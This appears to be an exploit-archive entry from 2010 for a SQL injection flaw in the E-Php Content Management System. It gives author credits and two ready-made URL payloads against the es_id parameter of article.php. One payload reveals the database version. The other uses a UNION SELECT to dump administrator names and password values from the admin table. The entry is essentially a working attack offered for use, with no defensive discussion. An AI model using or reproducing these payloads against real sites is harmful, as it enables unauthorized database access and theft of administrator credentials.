E-Php Content Management System SQL Injection Vulnerability

2010-11-05T00:00:00
ID 1337DAY-ID-14739
Type zdt
Reporter Cru3l.b0y
Modified 2010-11-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================
E-Php Content Management System SQL Injection Vulnerability
===========================================================

In The Name Of GOD
[+] Exploit Title: E-Php Content Management System SQL Injection Vulnerability
[+] Date: 2010-11-03
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.ephpscripts.com/content-management-system.php
[+] Tested on: Ubuntu 10.10
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
 
                http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12
                http://target/path/cms/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin



#  0day.today [2018-01-01]  #